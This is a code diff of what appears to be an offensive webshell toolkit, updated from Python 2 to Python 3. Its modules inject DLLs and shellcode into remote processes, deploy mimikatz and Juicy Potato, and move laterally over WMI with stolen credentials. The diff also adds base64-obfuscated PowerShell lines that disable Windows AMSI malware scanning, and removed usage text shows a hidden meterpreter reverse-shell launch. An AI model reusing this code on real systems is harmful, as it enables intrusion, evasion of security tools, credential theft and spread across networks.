modules/inject_dll_reflective.py

		skipped 51 lines
52	52		def __get_reflective_loader_offset(self, dll_path):
53	53		pe_parser = pefile.PE(dll_path)
54	54		for exported_function in pe_parser.DIRECTORY_ENTRY_EXPORT.symbols:
55		-	if 'ReflectiveLoader' in exported_function.name:
	55	+	if 'ReflectiveLoader' in str(exported_function.name):
56	56		reflective_loader_rva = exported_function.address
57	57		return hex(pe_parser.get_offset_from_rva(reflective_loader_rva))
58	58		raise self._exception_class('The DLL does not contain a reflective loader function.\n')
		skipped 4 lines
63	63		dll_path = config.modules_paths + 'reflective_dll/' + dll_path
64	64		code_offset = str(self.__get_reflective_loader_offset(dll_path))
65	65		with open(dll_path, 'rb') as file_handle:
66		-	byte_arr = bytearray(file_handle.read())
	66	+	byte_arr = file_handle.read()
67	67		base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(byte_arr)
68	68		if injection_type == 'remote_virtual_protect':
69	69		runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,
		skipped 8 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_srdi.py

		skipped 37 lines
38	38		functionHash = 0
39	39
40	40		for b in function:
41		-	b = ord(b)
42	41		functionHash = ror(functionHash, 13, 32)
43	42		functionHash += b
44	43
45	44		moduleHash = 0
46	45
47	46		for b in module:
48		-	b = ord(b)
49	47		moduleHash = ror(moduleHash, 13, 32)
50	48		moduleHash += b
51	49
		skipped 5 lines
57	55		functionHash = 0
58	56
59	57		for b in function:
60		-	b = ord(b)
61	58		functionHash = ror(functionHash, 13, 32)
62	59		functionHash += b
63	60
		skipped 217 lines
281	278		thread_parameters, exported_function_name, exported_function_data = self._parse_run_args(args)
282	279		dll_path = config.modules_paths + 'dll/' + dll_path
283	280		with open(dll_path, 'rb') as file_handle:
284		-	dll_bin_byte_arr = bytearray(file_handle.read())
	281	+	dll_bin_byte_arr = file_handle.read()
285	282		srdi_object = sRDI()
286	283		if exported_function_name != 0x10:
287	284		exported_function_name = srdi_object.HashFunctionName(exported_function_name)
		skipped 15 lines

■ ■ ■ ■ ■ ■

modules/inject_shellcode.py

		skipped 44 lines
45	45
46	46		"""
47	47
48		-	_runtime_code = ur"""
	48	+	_runtime_code = r"""
49	49		using System;using System.IO;using System.Diagnostics;using System.Text;
50	50		using System.Runtime.InteropServices; using System.IO.Compression;
51	51
		skipped 178 lines
230	230		}
231	231		"""
232	232
233		-	_runtime_code_virtual = ur"""
	233	+	_runtime_code_virtual = r"""
234	234		IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT \| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
235	235		if(codeMemAddress == (IntPtr)0){
236	236		output += error_string + "\n\tError allocating code buffer memory.\n\tVirtualAllocEx failed with error code " + Marshal.GetLastWin32Error();
		skipped 8 lines
245	245		output += "\n\n\tCode written into remote process. Bytes written: " + bytesWrittenCode.ToString();
246	246		"""
247	247
248		-	_runtime_code_virtual_protect = ur"""
	248	+	_runtime_code_virtual_protect = r"""
249	249		uint codeMemSize = codeMemorySize;
250	250		IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE);
251	251		if(codeMemAddress == (IntPtr)0){
		skipped 50 lines

■ ■ ■ ■ ■ ■

modules/invoke_ps_module.py

		skipped 36 lines
37	37		#invoke_ps_module PowerUp.ps1 ';Invoke-AllChecks'
38	38		"""
39	39
40		-	_ps_code = ur"""
	40	+	_ps_code = r"""
	41	+	[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw=="))\|IEX;
	42	+	[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw=="))\|IEX;
41	43		$path_in_module="%s";
42	44		$path_in_app_code="%s";
43	45		$key=[System.Text.Encoding]::UTF8.GetBytes('%s');
		skipped 13 lines
57	59		Remove-Item -Path $path_in_app_code -Force 2>&1 \| Out-Null;
58	60		"""
59	61
60		-	_ps_code_no_appended_code = ur"""
	62	+	_ps_code_no_appended_code = r"""
	63	+	[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==")) \| IEX;
	64	+	[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==")) \| IEX;
61	65		$path_in="%s";
62	66		$key=[System.Text.Encoding]::UTF8.GetBytes('%s');
63	67		$encrypted=[System.IO.File]::ReadAllBytes($path_in);
		skipped 44 lines
108	112		if '""' in appended_code:
109	113		appended_code = appended_code.replace('""', '"')
110	114		enc_appended_code_path = config.modules_paths + 'ps_modules/' + random_generator()
111		-	byte_arr_app_module_encrypted = bytearray(appended_code)
	115	+	byte_arr_app_module_encrypted = bytearray(appended_code, 'utf-8')
112	116		self.__xor_bytearray(byte_arr_app_module_encrypted)
113	117		with open(enc_appended_code_path, 'wb') as file_handle:
114	118		file_handle.write(byte_arr_app_module_encrypted)
		skipped 12 lines
127	131		encrypted_module_path = self._module_settings[ps_module]
128	132		else:
129	133		local_encrypted_module_path = self._gen_encrypted_module(ps_module)
130		-	print '\n\n\nUploading encrypted ps module....\n'
	134	+	print ('\n\n\nUploading encrypted ps module....\n')
131	135		try:
132	136		encrypted_module_path = self._module_settings['env_directory'] + '\\' + random_generator()
133	137		upload_response = self._parse_response(self.upload_module_object.run([local_encrypted_module_path,
134	138		encrypted_module_path]))
135		-	print upload_response
	139	+	print (upload_response)
136	140		self._module_settings[ps_module] = encrypted_module_path
137	141		except Exception as exc:
138	142		raise self._exception_class(str(exc))
		skipped 29 lines

■ ■ ■ ■ ■ ■

modules/lateral_wmi.py

		skipped 13 lines
14	14		This module run a wmic /node:[ip] command in order to launch commands on a remote windows system.
15	15		This will result in a lateral movement if shared credentials are known.
16	16
17		-	Note that if you use local users credentials you should ensure that, on the target server, the feature
18		-	"LocalAccountTokenFilterPolicy" is disabled.
	17	+	Note that if you use local admin credentials you should ensure that, on the target server, the feature
	18	+	"LocalAccountTokenFilterPolicy" is disabled. (except for builtin Administrator)
19	19		To disable that you need to add the following regkey with the value of 1:
20	20
21	21		HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy
		skipped 2 lines
24	24		reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
25	25
26	26		If you use domain users for the lateral movement, no restrictions to the process token will be applied.
	27	+	Remember to always specify the domain in the username field. If you use a local account use the machine name as the domain.
27	28
28	29		This module uses WMI builtin features wmi and doesn't need additional files to be droppend on the target
29	30		server.
30	31
31		-	Moreover this module should be run from a privileged user.
32		-	If the application pool within the web application you are interacting with is run with application pool
33		-	identity account or any limited account you won't be able to move laterally to other systems
34		-	due to restrictions applied to the user.
35		-	In those cases, you need to use different credentials of a more privileged user in order to launch this module.
36		-
37	32		Note that, wmi commands don't return stdout/stderr output from the execution of remote processes.
38	33		You should redirect output to a shared resource (i.e. local share with everyone permission) or just spawn
39	34		reverse/bind shell.
		skipped 7 lines
47	42		you can specify domain\username if user is in a domain
48	43		password password of the user to use to login on the target server
49	44		command a command compatible by cmd.exe
50		-	[local_user] the username of a local user with privileged rights
51		-	[local_password] the password of a local user with privileged rights
52		-	[local_domain] the domain of a local user with privileged rights
53	45
54	46		Examples:
55	47		Lateral movement as privileged current application pool user, output to local shared resource:
56		-	#lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' 'whoami /priv > \\192.168.56.101\everyone\output.txt'
57		-	Lateral movement as privileged local user using meterpreter http reverse shell (format psh-cmd):
58		-	#lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmA.......HMAKQA7AA==' 'local_privileged_user1' 'local_privileged_password1'
59		-	Lateral movement as privileged domain user using meterpreter http reverse shell (format psh-cmd):
60		-	#lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmA.......HMAKQA7AA==' 'domain_privileged_user1' 'domain_privileged_password1' 'domain_1'
	48	+	#lateral_wmi 192.168.56.102 'domain\remote_user1' 'remote_password1' 'whoami /all > C:\Windows\Temp\whoami.txt'
61	49
62	50		"""
63	51
64		-	_runtime_code = ur"""
	52	+	_runtime_code = r"""
65	53		using System;using System.IO;using System.Diagnostics;using System.Text;
66	54		public class SharPyShell
67	55		{
		skipped 36 lines
104	92		}
105	93		"""
106	94
107		-	_runtime_code_runas = ur"""
108		-	using System;using System.IO;using System.Diagnostics;using System.Text;
109		-	using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
110		-
111		-	public class SharPyShell
112		-	{
113		-	public sealed class SafeTokenHandle : SafeHandleZeroOrMinusOneIsInvalid
114		-	{
115		-	private SafeTokenHandle()
116		-	: base(true)
117		-	{
118		-	}
119		-
120		-	[DllImport("kernel32.dll")]
121		-	[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
122		-	[SuppressUnmanagedCodeSecurity]
123		-	[return: MarshalAs(UnmanagedType.Bool)]
124		-	private static extern bool CloseHandle(IntPtr handle);
125		-
126		-	protected override bool ReleaseHandle()
127		-	{
128		-	return CloseHandle(handle);
129		-	}
130		-	}
131		-
132		-	[StructLayout(LayoutKind.Sequential)] public struct STARTUPINFO
133		-	{
134		-	public int cb;
135		-	public String lpReserved;
136		-	public String lpDesktop;
137		-	public String lpTitle;
138		-	public uint dwX;
139		-	public uint dwY;
140		-	public uint dwXSize;
141		-	public uint dwYSize;
142		-	public uint dwXCountChars;
143		-	public uint dwYCountChars;
144		-	public uint dwFillAttribute;
145		-	public uint dwFlags;
146		-	public short wShowWindow;
147		-	public short cbReserved2;
148		-	public IntPtr lpReserved2;
149		-	public IntPtr hStdInput;
150		-	public IntPtr hStdOutput;
151		-	public IntPtr hStdError;
152		-	}
153		-
154		-	[StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION
155		-	{
156		-	public IntPtr hProcess;
157		-	public IntPtr hThread;
158		-	public uint dwProcessId;
159		-	public uint dwThreadId;
160		-	}
161		-
162		-	[StructLayout(LayoutKind.Sequential)] public struct SECURITY_ATTRIBUTES
163		-	{
164		-	public int Length;
165		-	public IntPtr lpSecurityDescriptor;
166		-	public bool bInheritHandle;
167		-	}
168		-
169		-	[DllImport("kernel32.dll", EntryPoint="CloseHandle", SetLastError=true, CharSet=CharSet.Auto, CallingConvention=CallingConvention.StdCall)]
170		-	public static extern bool CloseHandle(IntPtr handle);
171		-
172		-	[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
173		-	public static extern bool LogonUser(String lpszUsername, String lpszDomain, String lpszPassword, int dwLogonType, int dwLogonProvider, out SafeTokenHandle phToken);
174		-
175		-	[DllImport("advapi32.dll", EntryPoint="CreateProcessAsUser", SetLastError=true, CharSet=CharSet.Ansi, CallingConvention=CallingConvention.StdCall)]
176		-	public static extern bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
177		-
178		-	[DllImport("advapi32.dll", EntryPoint="DuplicateTokenEx")]
179		-	public static extern bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpThreadAttributes, int TokenType, int ImpersonationLevel, ref IntPtr DuplicateTokenHandle);
180		-
181		-	[DllImport("kernel32.dll", SetLastError=true)]
182		-	public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
183		-
184		-	const uint WAIT_ABANDONED = 0x00000080;
185		-	const uint WAIT_OBJECT_0 = 0x00000000;
186		-	const uint WAIT_TIMEOUT = 0x00000102;
187		-
188		-	[PermissionSetAttribute(SecurityAction.Demand, Name = "FullTrust")]
189		-	public string LateralWMIRunas(string userName, string password, string domainName, string wmi_arguments, string stdout_file, string stderr_file, string working_directory)
190		-	{
191		-	SafeTokenHandle safeTokenHandle;
192		-	int logon_type = 4;
193		-	uint process_ms_timeout = 60000;
194		-	string output = "";
195		-	string error_string = "{{{SharPyShellError}}}";
196		-	try
197		-	{
198		-	const int LOGON32_PROVIDER_DEFAULT = 0;
199		-	const int LOGON32_PROVIDER_WINNT35 = 1;
200		-	const int LOGON32_PROVIDER_WINNT40 = 2;
201		-	const int LOGON32_PROVIDER_WINNT50 = 3;
202		-	bool returnValue = LogonUser(userName, domainName, password, logon_type, LOGON32_PROVIDER_DEFAULT, out safeTokenHandle);
203		-	if (false == returnValue)
204		-	{
205		-	output += error_string + "\nWrong Credentials. LogonUser failed with error code : " + Marshal.GetLastWin32Error();
206		-	return output;
207		-	}
208		-	using (safeTokenHandle)
209		-	{
210		-	using (WindowsIdentity newId = new WindowsIdentity(safeTokenHandle.DangerousGetHandle()))
211		-	{
212		-	using (WindowsImpersonationContext impersonatedUser = newId.Impersonate())
213		-	{
214		-	IntPtr Token = new IntPtr(0);
215		-	IntPtr DupedToken = new IntPtr(0);
216		-	bool ret;
217		-	SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
218		-	sa.bInheritHandle = false;
219		-	sa.Length = Marshal.SizeOf(sa);
220		-	sa.lpSecurityDescriptor = (IntPtr)0;
221		-	Token = WindowsIdentity.GetCurrent().Token;
222		-	const uint GENERIC_ALL = 0x10000000;
223		-	const int SecurityImpersonation = 2;
224		-	const int TokenType = 1;
225		-	ret = DuplicateTokenEx(Token, GENERIC_ALL, ref sa, SecurityImpersonation, TokenType, ref DupedToken);
226		-	if (ret == false){
227		-	output += error_string + "\nDuplicateTokenEx failed with " + Marshal.GetLastWin32Error();
228		-	return output;
229		-	}
230		-	STARTUPINFO si = new STARTUPINFO();
231		-	si.cb = Marshal.SizeOf(si);
232		-	si.lpDesktop = "";
233		-	string commandLinePath = "";
234		-	File.Create(stdout_file).Dispose();
235		-	File.Create(stderr_file).Dispose();
236		-	string cmd_path = commandLinePath = Environment.GetEnvironmentVariable("ComSpec");
237		-	string wmic_path = Environment.GetEnvironmentVariable("SYSTEMROOT") + "\\system32\\wbem\\wmic.exe";
238		-	commandLinePath = cmd_path + " /c " + wmic_path + " " + wmi_arguments + " >> " + stdout_file + " 2>>" + stderr_file;
239		-	PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
240		-	ret = CreateProcessAsUser(DupedToken,null,commandLinePath, ref sa, ref sa, false, 0, (IntPtr)0, working_directory, ref si, out pi);
241		-	if (ret == false){
242		-	output += error_string + "\nCreateProcessAsUser failed with " + Marshal.GetLastWin32Error();
243		-	return output;
244		-	}
245		-	else{
246		-	uint wait_for = WaitForSingleObject(pi.hProcess, process_ms_timeout);
247		-	if(wait_for == WAIT_OBJECT_0){
248		-	output += "\n" + File.ReadAllText(stdout_file);
249		-	string errors = File.ReadAllText(stderr_file);
250		-	if (!String.IsNullOrEmpty(errors))
251		-	output += "\n" + errors;
252		-	}
253		-	else{
254		-	output += error_string + "\nProcess with pid " + pi.dwProcessId + " couldn't end correctly. Error Code: " + Marshal.GetLastWin32Error();
255		-	}
256		-	File.Delete(stdout_file);
257		-	File.Delete(stderr_file);
258		-	CloseHandle(pi.hProcess);
259		-	CloseHandle(pi.hThread);
260		-	}
261		-	CloseHandle(DupedToken);
262		-	}
263		-	}
264		-	}
265		-	}
266		-	catch (Exception ex)
267		-	{
268		-	output += error_string + "\nException occurred. " + ex.Message;
269		-	return output;
270		-	}
271		-	return output;
272		-	}
273		-
274		-	public byte[] ExecRuntime()
275		-	{
276		-	string output_func=LateralWMIRunas(@"%s", @"%s", @"%s", @"%s", @"%s", @"%s", @"%s");
277		-	byte[] output_func_byte=Encoding.UTF8.GetBytes(output_func);
278		-	return(output_func_byte);
279		-	}
280		-	}
281		-	"""
282		-
283		-	__default_local_user = ''
284		-	__default_local_password = ''
285		-	__default_local_domain = ''
286		-	__wmi_code_arguments = ur'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
	95	+	__wmi_code_arguments = r'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
287	96
288	97		def __run_as_current_user(self, wmi_code_arguments):
289		-	request = self._create_request([wmi_code_arguments, 'current_user'])
290		-	encrypted_request = self._encrypt_request(request)
291		-	encrypted_response = self._post_request(encrypted_request)
292		-	decrypted_response = self._decrypt_response(encrypted_response)
293		-	return decrypted_response
294		-
295		-	def __run_as(self, wmi_code_arguments, local_user, local_password, local_domain):
296		-	request = self._create_request([[wmi_code_arguments, local_user, local_password, local_domain], 'runas'])
	98	+	request = self._create_request(wmi_code_arguments)
297	99		encrypted_request = self._encrypt_request(request)
298	100		encrypted_response = self._post_request(encrypted_request)
299	101		decrypted_response = self._decrypt_response(encrypted_response)
		skipped 7 lines
307	109		username = args_parser.get(1)
308	110		password = args_parser.get(2)
309	111		command = args_parser.get(3)
310		-	local_user = args_parser.get(4, self.__default_local_user)
311		-	local_password = args_parser.get(5, self.__default_local_password)
312		-	local_domain = args_parser.get(6, self.__default_local_domain)
313		-	return target_ip, username, password, command, local_user, local_password, local_domain
	112	+	return target_ip, username, password, command
314	113
315	114		def _create_request(self, args):
316		-	arguments, request_type = args
	115	+	arguments = args
317	116		working_path = self._module_settings['working_directory']
318		-	if request_type == 'runas':
319		-	wmi_code_arguments, local_user, local_password, local_domain = arguments
320		-	stdout_file = self._module_settings['env_directory'] + '\\' + random_generator()
321		-	stderr_file = self._module_settings['env_directory'] + '\\' + random_generator()
322		-	request = self._runtime_code_runas % (local_user, local_password, local_domain, wmi_code_arguments,
323		-	stdout_file, stderr_file, working_path)
324		-	else:
325		-	wmi_code_arguments = arguments
326		-	request = self._runtime_code % (wmi_code_arguments, working_path)
	117	+	wmi_code_arguments = arguments
	118	+	request = self._runtime_code % (wmi_code_arguments, working_path)
327	119		return request
328	120
329	121		def run(self, args):
330	122		try:
331		-	target_ip, username, password, command,\
332		-	local_user, local_password, local_domain = self.__parse_run_args(args)
	123	+	target_ip, username, password, command = self.__parse_run_args(args)
333	124		wmi_code_arguments = self.__wmi_code_arguments % (target_ip, username, password, command)
334		-	if local_user == '':
335		-	response = self.__run_as_current_user(wmi_code_arguments)
336		-	else:
337		-	response = self.__run_as(wmi_code_arguments, local_user, local_password, local_domain)
	125	+	response = self.__run_as_current_user(wmi_code_arguments)
338	126		parsed_response = self._parse_response(response)
339	127		except ModuleException as module_exc:
340	128		parsed_response = str(module_exc)
		skipped 5 lines

■ ■ ■ ■ ■ ■

modules/mimikatz.py

		skipped 7 lines
8	8		from modules.inject_dll_srdi import Inject_dll_srdi
9	9		from utils.random_string import random_generator
10	10		import traceback
	11	+	import os
11	12
12	13
13	14		class MimikatzModuleException(ModuleException):
		skipped 90 lines
104	105		if 'mimikatz.exe' in self._module_settings.keys():
105	106		bin_path = self._module_settings['mimikatz.exe']
106	107		else:
107		-	exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
	108	+	exe_path = config.modules_paths + 'exe_modules' + os.sep + 'mimikatz.exe'
108	109		remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
109		-	print '\n\n\nUploading mimikatz binary....\n'
	110	+	print ('\n\n\nUploading mimikatz binary....\n')
110	111		upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
111		-	print upload_response
	112	+	print (upload_response)
112	113		self._module_settings['mimikatz.exe'] = remote_upload_path
113	114		bin_path = remote_upload_path
114	115		return bin_path
		skipped 11 lines
126	127		dll_name = 'powerkatz.dll'
127	128		exported_function_name = 'powershell_reflective_mimikatz'
128	129		log_file = self._module_settings['env_directory'] + '\\' + random_generator()
129		-	exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
	130	+	exported_function_data = str.encode('"log ' + log_file + '" ' + custom_command + '\x00', 'utf-16-le')
130	131		if username == '':
131		-	print '\n\nInjecting converted DLL shellcode into remote process...'
	132	+	print ('\n\nInjecting converted DLL shellcode into remote process...')
132	133		response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
133	134		exported_function_name, exported_function_data])
134	135		response = self._parse_response(response)
		skipped 32 lines

■ ■ ■ ■ ■ ■

modules/privesc_juicy_potato.py

		skipped 55 lines
56	56		#privesc_juicy_potato 'whoami > C:\windows\temp\whoami_juicy.txt' 'exe'
57	57		"""
58	58
59		-	_runtime_code = ur"""
	59	+	_runtime_code = r"""
60	60		using System;using System.IO;using System.Diagnostics;using System.Text;
61	61		public class SharPyShell
62	62		{
		skipped 67 lines
130	130		else:
131	131		exe_path = config.modules_paths + 'exe_modules/JuicyPotato.exe'
132	132		remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
133		-	print '\n\n\nUploading Juicy Potato binary....\n'
	133	+	print ('\n\n\nUploading Juicy Potato binary....\n')
134	134		upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
135		-	print upload_response
	135	+	print (upload_response)
136	136		self._module_settings['JuicyPotato.exe'] = remote_upload_path
137	137		bin_path = remote_upload_path
138	138		return bin_path
		skipped 9 lines
148	148		return parsed_response
149	149
150	150		def __run_reflective_dll_version(self, cmd, custom_shellcode_path, logfile, clsid):
151		-	LogFile = logfile
152		-	remote_process = 'notepad.exe'
153		-	CLSID = clsid
154		-	ListeningPort = self.__random_listening_port
155		-	RpcServerHost = '127.0.0.1'
156		-	RpcServerPort = '135'
157		-	ListeningAddress = '127.0.0.1'
	151	+	LogFile = logfile.encode()
	152	+	remote_process = b'notepad.exe'
	153	+	CLSID = clsid.encode()
	154	+	ListeningPort = self.__random_listening_port.encode()
	155	+	RpcServerHost = b'127.0.0.1'
	156	+	RpcServerPort = b'135'
	157	+	ListeningAddress = b'127.0.0.1'
158	158		if custom_shellcode_path == 'default':
159		-	shellcode_bytes = shellcode.winexec_x64 + 'cmd /c "' + cmd + '"\00'
	159	+	shellcode_bytes = shellcode.winexec_x64 + b'cmd /c "' + cmd.encode() + b'"\00'
160	160		thread_timeout = '60000'
161	161		else:
162	162		thread_timeout = '0'
163	163		with open(custom_shellcode_path, 'rb') as file_handle:
164	164		shellcode_bytes = file_handle.read()
165		-	configuration = LogFile + '\00'
166		-	configuration += remote_process + '\00'
167		-	configuration += CLSID + '\00'
168		-	configuration += ListeningPort + '\00'
169		-	configuration += RpcServerHost + '\00'
170		-	configuration += RpcServerPort + '\00'
171		-	configuration += ListeningAddress + '\00'
172		-	configuration += str(len(shellcode_bytes)) + '\00'
	165	+	configuration = LogFile + b'\00'
	166	+	configuration += remote_process + b'\00'
	167	+	configuration += CLSID + b'\00'
	168	+	configuration += ListeningPort + b'\00'
	169	+	configuration += RpcServerHost + b'\00'
	170	+	configuration += RpcServerPort + b'\00'
	171	+	configuration += ListeningAddress + b'\00'
	172	+	configuration += str(len(shellcode_bytes)).encode() + b'\00'
173	173		configuration += shellcode_bytes
174		-	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in bytearray(configuration)) + '}'
	174	+	configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration) + '}'
175	175		response = self.inject_dll_reflective_module_object.run(['juicypotato_reflective.dll', 'remote_virtual',
176	176		'cmd.exe', thread_timeout, configuration_bytes_csharp])
177	177		parsed_response = self._parse_response(response)
		skipped 11 lines
189	189		response = self.__run_exe_version(cmd, arguments)
190	190		else:
191	191		logfile = self._module_settings['env_directory'] + '\\' + random_generator()
192		-	print '\n\nInjecting Reflective DLL into remote process...'
	192	+	print ('\n\nInjecting Reflective DLL into remote process...')
193	193		response = self.__run_reflective_dll_version(cmd, custom_shellcode_path, logfile, clsid)
194	194		response += '\nReflective DLL injection executed!\n\n'
195	195		if custom_shellcode_path == 'default':
		skipped 9 lines

modules/ps_modules/Invoke-Mimikatz.ps1

Unable to diff as some line is too long.

■ ■ ■ ■ ■ ■

modules/runas.py

		skipped 33 lines
34	34		domain domain of the user, if in a domain.
35	35		Default: ''
36	36		process_timeout_ms the waiting time (in ms) to use in the WaitForSingleObject() function.
37		-	This will halt the process until the spawned process ends and sent
38		-	the output back to the webshell.
	37	+	This will halt the process until the spawned process ends and sent the output back to the webshell.
39	38		If you set 0 an async process will be created and no output will be retrieved.
40	39		Default: '60000'
41	40		logon_type the logon type for the spawned process.
		skipped 13 lines
55	54
56	55		"""
57	56
58		-	_runtime_code = ur"""
	57	+	_runtime_code = r"""
59	58		using System;using System.IO;using System.Diagnostics;using System.Text;
60	59		using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
61	60
		skipped 274 lines
336	335		domain = args_parser.get(3, self.__default_domain)
337	336		process_ms_timeout = args_parser.get(4, self.__default_process_ms_timeout)
338	337		logon_type = args_parser.get(5, self.__default_logon_type)
	338	+	if process_ms_timeout == '' or logon_type == '':
	339	+	raise self._exception_class('#runas: process_ms_timeout and logon_type field cannot be empty.\n')
339	340		return cmd, username, password, domain,process_ms_timeout, logon_type
340	341
341	342		def _create_request(self, args):
		skipped 9 lines

■ ■ ■ ■ ■ ■

modules/runas_ps.py

		skipped 52 lines
53	53		def __gen_powershell_launcher(self, ps_code):
54	54		powershell_launcher='powershell -nop -noni -enc '
55	55		ps_code = '$ProgressPreference = "SilentlyContinue";' + ps_code
56		-	powershell_launcher += b64encode(ps_code.encode('UTF-16LE'))
	56	+	powershell_launcher += str(b64encode(ps_code.encode('UTF-16LE')),'UTF-8')
57	57		return powershell_launcher
58	58
59	59		def _create_request(self, args):
		skipped 6 lines
66	66		stderr_file = self._module_settings['env_directory'] + '\\' + random_generator()
67	67		return self._runtime_code % (username, password, domain, cmd, stdout_file, stderr_file,
68	68		working_path, logon_type, process_ms_timeout)
	69	+

■ ■ ■ ■ ■ ■

modules/upload.py

		skipped 34 lines
35	35		#upload /tmp/revshell.exe C:\Users\Public\revshell.exe 1024
36	36		"""
37	37
38		-	_runtime_code = ur"""
	38	+	_runtime_code = r"""
39	39		using System;using System.IO;using System.Diagnostics;using System.Text;
40	40		public class SharPyShell{
41	41		byte[] Upload(string path, byte[] file_bytes){
		skipped 14 lines
56	56		}
57	57		"""
58	58
59		-	__runtime_code_split_file = ur"""
	59	+	__runtime_code_split_file = r"""
60	60		using System;using System.IO;using System.Diagnostics;using System.Text;
61	61		public class SharPyShell{
62	62		byte[] Upload(string path, byte[] file_bytes){
		skipped 17 lines
80	80		}
81	81		"""
82	82
83		-	__runtime_code_init_file = ur"""
	83	+	__runtime_code_init_file = r"""
84	84		using System;using System.IO;using System.Diagnostics;using System.Text;
85	85		public class SharPyShell{
86	86		string InitFile(string path){
		skipped 77 lines
164	164		decrypted_response = self._decrypt_response(encrypted_response)
165	165		parsed_response = self._parse_response(decrypted_response)
166	166		if len(requests) > 1:
167		-	print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_sizei) + ' - ' + str(chunk_sizei+chunk_size) +\
168		-	' bytes written correctly to ' + upload_output_path
	167	+	print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_sizei) + ' - ' + str(chunk_sizei+chunk_size) +\
	168	+	' bytes written correctly to ' + upload_output_path)
169	169		except ModuleException as module_exc:
170	170		parsed_response = str(module_exc)
171	171		except Exception:
		skipped 4 lines

■ ■ ■ ■ ■ ■

requirements.txt

1	1		urllib3
2	2		PySocks
3		-	pycrypto
	3	+	pycryptodome
4	4		pyopenssl
5	5		pefile
6	6		prettytable

■ ■ ■ ■ ■ ■

utils/Singleton.py

		skipped 2 lines
3	3
4	4		def __new__(cls, args, *kwargs):
5	5		if cls not in cls._instances:
6		-	cls._instances[cls] = super(Singleton, cls).__new__(cls, args, *kwargs)
	6	+	cls._instances[cls] = super(Singleton, cls).__new__(cls)
7	7		return cls._instances[cls]
	8	+

■ ■ ■ ■ ■ ■

utils/gzip_utils.py

1		-	import StringIO
	1	+	import io
2	2		import gzip
3	3		import base64
4	4
5	5
6	6		def get_compressed_base64_from_file(path):
7		-	compressed_stream = StringIO.StringIO()
8		-	with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed, open(path, 'rb') as infile:
9		-	compressed.write(infile.read())
10		-	return base64.b64encode(compressed_stream.getvalue())
	7	+
	8	+	with open(path, 'rb') as f:
	9	+	read_data = f.read()
	10	+	return base64.b64encode(gzip.compress(read_data)).decode()
11	11
12	12
13	13		def get_compressed_base64_from_binary(bin_bytearray_input):
14		-	compressed_stream = StringIO.StringIO()
15		-	with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed:
16		-	compressed.write(str(bin_bytearray_input))
17		-	return base64.b64encode(compressed_stream.getvalue())
